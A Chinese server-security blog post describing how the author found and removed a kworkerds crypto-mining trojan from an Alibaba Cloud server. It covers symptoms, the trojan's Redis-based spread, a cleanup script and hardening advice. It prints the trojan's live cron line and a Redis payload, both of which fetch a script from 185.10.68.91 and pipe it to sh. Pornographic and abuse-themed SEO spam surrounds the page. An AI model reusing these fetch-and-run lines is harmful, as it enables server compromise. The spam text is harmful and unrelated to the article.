国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

服務器之家:專注于服務器技術及軟件下載分享
分類導航

云服務器|WEB服務器|FTP服務器|郵件服務器|虛擬主機|服務器安全|DNS服務器|服務器知識|Nginx|IIS|Tomcat|

服務器之家 - 服務器技術 - 服務器安全 - 記一次阿里云被植入挖礦木馬事件

記一次阿里云被植入挖礦木馬事件

2019-06-16 15:22麻辣軟硬件達不優D 服務器安全

很多朋友都在使用阿里云,但遇到過阿里云被植入木馬的情況么?小編今天就遇到了。阿里云有自己的安全機制,一般情況下不會有什么問題,那木馬又是被怎么植入的呢?今天為您解析。

一、起因

今天,同事說我負責的模塊在阿里云上不工作了,我趕忙遠程登錄查看。

1. 服務器的癥狀

  • 敲命令的時候,終端的字符回傳很快,但是命令的響應時間較長;
  • 服務器內存32GB,剩余200MB;
  • CPU跑到了99%;
  • 我負責的模塊之前一直工作正常,穩定性好,沒修改過配置,但現在不能工作;
  • 查看我負責的模塊配置正常、運行正常,但部分服務出錯;
  • top命令未發現有高耗CPU的進程,但是有大量的kworkerds進程。

2. 定位分析

病癥1、3、6說明是阿里云服務器已經產生了異常。

根據病癥4、5一步步梳理流程,核對日志,定位問題,最終發現,redis可以正常提供服務,但程序無法將數據刷新到redis,導致分別負責讀寫的兩個模塊數據長時間不能同步,重啟redis后服務正常。但問題需要進一步分析。

記一次阿里云被植入挖礦木馬事件

二、查找木馬

服務器是與別人共用的,其他的服務,我們不知道是否有用。但服務器卡頓,實在影響調試效率,搜索了一下kworkerds,才知道是個挖礦的木馬程序。

查看木馬進程數


  1. [root@xxx ~]# ps -ef | grep -v grep |grep kworkerds | wc -l 
  2. 385 

kill掉所有木馬進程


  1. [root@xxx ~] # ps auxf | grep -v grep | grep kworkerds | awk '{print $2}' | xargs kill -9 

查看開機啟動項和任務


  1.  [root@XXX ~]# systemctl list-unit-files 
  2.  (沒發現問題,就不貼進來了) 
  3.  [root@XXX ~]# cat /etc/rc.local 
  4.  (沒發現問題,就不貼進來了) 
  5.  [root@XXX ~]# cat /etc/crontab 
  6.  ... 
  7.  01 * * * * root run-parts /etc/cron.hourly 
  8.  02 4 * * * root run-parts /etc/cron.daily 
  9.  0 1 * * * root /usr/local/bin/dns 
  10. [root@XXX ~]# crontab -l 
  11. */23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh 

“/etc/crontab”里的內容看起來好像是正常,但是“crontab -l”中顯示的內容有些來路不明。

于是下載代碼查看


  1. [root@xxx ~]# (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1) 
  2. (木馬的代碼我就不貼進來了) 

限于篇幅,木馬的代碼就不展示在此了,大家可以自行下載查看,記住,下載的時候要把"|sh"去掉,當心玩火自焚。

三、分析木馬

木馬腳本寫得還是不錯的,風格整齊,邏輯嚴謹。出色地完成了以下功能:

  • 刪除阿里云云盾客戶端和阿里云監控程序;
  • 停止、刪除主機已經存在的其他挖礦程序;
  • 下載挖礦程序和配置文件并執行;
  • 約束木馬程序,防止觸發服務器性能監測工具告警;
  • 設置任務計劃,保持更新,持續感染主機;
  • 通過本機感染其他主機;
  • 清空操作日志,篡改文件修改時間,隱藏自己的訪問蹤跡。

木馬中同時用了shell和python兩種腳本,腳本逐層嵌套,對于一些敏感的代碼,使用了base64進行加密,針對不同的系統平臺有不同的處理,同時鎖定了自己修改的文件,防止被別的程序隨意修改,提供遠程服務的IP地址來自非洲東部的塞舌爾共和國。

記一次阿里云被植入挖礦木馬事件

記一次阿里云被植入挖礦木馬事件

四、木馬是如何傳播的

1. 傳播方式

木馬傳播方式有三種,如下:

  • activeMQ
  • redis
  • ssh的免密碼登錄

2. 傳播思路

木馬感染的步驟如下:


  • 通過掃描"xxx.xxx.0.0/16"網段內的所有IP的6379和8186兩個端口;
  • 如果可以連接,那么以key-value的形式寫入數據;
    1. 'set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n' 
  • 將該條數據以文件的形式保存到定時任務的文件目錄,如/var/spool/cron/root等;
  • 下個定時周期到來時,服務器自動下載遠程腳本并執行;
  • 遍歷該主機可以免密碼登錄的其他主機,遠程連接并執行代碼。

遠程腳本執行時,會重新修改定時任務等文件,保證可以持續感染主機,同時也隱藏了第一次感染的痕跡。之后每個定時周期到來時,都會重復4、5兩個步驟。

3. 排查漏洞

服務器中沒有activeMQ,沒有.ssh文件夾。小編也根據代碼流程,感染了一下自己的redis,但是并沒有達到預期的結果。

本人用的redis文件保存的時候是二進制的,不是字符串,根本無法被定時任務執行,但是修改感染腳本,可以完成黑客設置的既定思路。

結合阿里云之前修改過密碼的情況,本次感染可能有兩種來源:

  • 以前發現了被感染,但木馬沒有被清理干凈;
  • 木馬作者會定期修改自己的代碼來感染不同版本的redis,甚至是去利用其它軟件的漏洞。

另外一個代碼變動的證據就是netstat命令的二進制文件遭到篡改,這顯然是為了應對運維人員排查異常網絡連接而設計的,但本次檢查木馬代碼時,并沒有發現與netstat命令有關的操作。

五、清理木馬

清理過程分兩步:刪除木馬文件和修補當前漏洞。

1. 刪除木馬文件

根據木馬的代碼,寫了清理腳本,如下:


  1. #!/bin/bash 
  2. ps auxf | grep -v grep | grep kworkerds | awk '{print $2}' | xargs kill -9 
  3.  
  4. chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload 
  5. echo "" > /usr/local/bin/dns 
  6. echo "" > /etc/cron.d/root 
  7. echo "" > /etc/cron.d/apache 
  8. echo "" > /var/spool/cron/root 
  9. echo "" > /var/spool/cron/crontabs/root 
  10. rm -rf /etc/cron.hourly/oanacroner 
  11. rm -rf /etc/cron.daily/oanacroner 
  12. rm -rf  /etc/cron.monthly/oanacroner 
  13.  
  14. sed -i '/cron.hourly/d' /etc/crontab 
  15. sed -i '/cron.daily/d' /etc/crontab 
  16. sed -i '/usr\/local\/bin\/dns/d' /etc/crontab 
  17.  
  18. #sed -i '$d' /etc/ld.so.preload 
  19. rm -rf /usr/local/lib/libntpd.so 
  20.  
  21. #/tmp/.a可以不刪,木馬是通過此文件判斷是否要卸載阿里云盾 
  22. #rm -rf /tmp/.a 
  23. rm -rf /bin/kworkerds 
  24. rm -rf /tmp/kworkerds 
  25. rm -rf /usr/sbin/kworkerds 
  26. rm -rf /etc/init.d/kworker 
  27. chkconfig --del kworker 

腳本僅供大家參考,在執行之前還是要對照一下具體的環境。

除此之外,還需要排查一下系統中是否有異常用戶,異常的服務和異常的監聽端口。畢竟服務器被入侵過,絕不能等閑視之。

2. 修補漏洞

以redis為例,修補漏洞有很多種方法:

  • 限制端口,使其對外不可連接;
  • 不要使用root運行reids;
  • 及時更新軟件,修補漏洞;
  • 修改默認端口;
  • 對重要命令重命名;

關于這個問題,阿里云也有詳細的安全加固方案:

https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.3.29131848FutMrC

編者的話

黑客一詞聽起來感覺酷酷的,因為世界上確有一批崇尚用技術實現“開放、自由、真實、平等、美好生活”的人,他們離經叛道,閃閃發光。然而,通常情況下非法獲取利益的黑客僅僅是一個小偷而已,喜歡的是不勞而獲,而不是技術本身,技術水平也只能是一般。

希望大家從技術交流,防范風險的角度看待文中提供的木馬資料,不要走上違法犯罪的道路。從另一個角度講,信息安全無小事,文中的木馬僅僅是挖礦,事實上,該漏洞足以讓黑客在你的服務器上做任何事,大家萬萬不可掉以輕心。

延伸 · 閱讀

精彩推薦
Weibo Article 1 Weibo Article 2 Weibo Article 3 Weibo Article 4 Weibo Article 5 Weibo Article 6 Weibo Article 7 Weibo Article 8 Weibo Article 9 Weibo Article 10 Weibo Article 11 Weibo Article 12 Weibo Article 13 Weibo Article 14 Weibo Article 15 Weibo Article 16 Weibo Article 17 Weibo Article 18 Weibo Article 19 Weibo Article 20 Weibo Article 21 Weibo Article 22 Weibo Article 23Weibo Article 24 Weibo Article 25 Weibo Article 26 Weibo Article 27 Weibo Article 28 Weibo Article 29 Weibo Article 30 Weibo Article 31 Weibo Article 32 Weibo Article 33 Weibo Article 34 Weibo Article 35 Weibo Article 36 Weibo Article 37 Weibo Article 38 Weibo Article 39 Weibo Article 40 Weibo Article 41 Weibo Article 42
主站蜘蛛池模板: 中文字幕在线观看一区二区三区 | 亚洲在线电影 | 狠狠草视频 | 狠狠艹 | 天天精品视频免费观看 | 欧美激情高清 | 国产成人精品一区二区三区视频 | 久久久精品网站 | 在线观看成人高清 | 青青久草在线 | 亚洲国产精品一区二区久久 | 欧美亚洲国产一区二区三区 | 成人av电影天堂 | 精品日韩一区二区 | 久久久精品视频免费观看 | 久久国产精品视频 | 久久66| 国产精品一二三区 | 中文字幕在线观看一区二区 | av在线日韩 | 欧美日韩综合在线 | 黄色片网站免费观看 | 天天干夜夜操 | 久久久久久极品 | 午夜大片网 | 欧美成人一区二免费视频软件 | 性欧美大战久久久久久久免费观看 | 日韩欧美精品一区二区 | 精品免费久久久久 | 亚洲视频区| 亚洲 欧美 国产 制服 动漫 | 欧美不卡一区二区三区 | 九九九久久国产免费 | 亚洲综合色成在线播放 | 国产午夜精品一区二区三区视频 | 欧美日韩国产一区二区 | 亚洲一区二区三区免费 | 欧美日韩一区二区三区不卡视频 | 中文字幕一区二区三区日韩精品 | 99精品欧美一区二区三区综合在线 | 一区二区三区久久久久久 |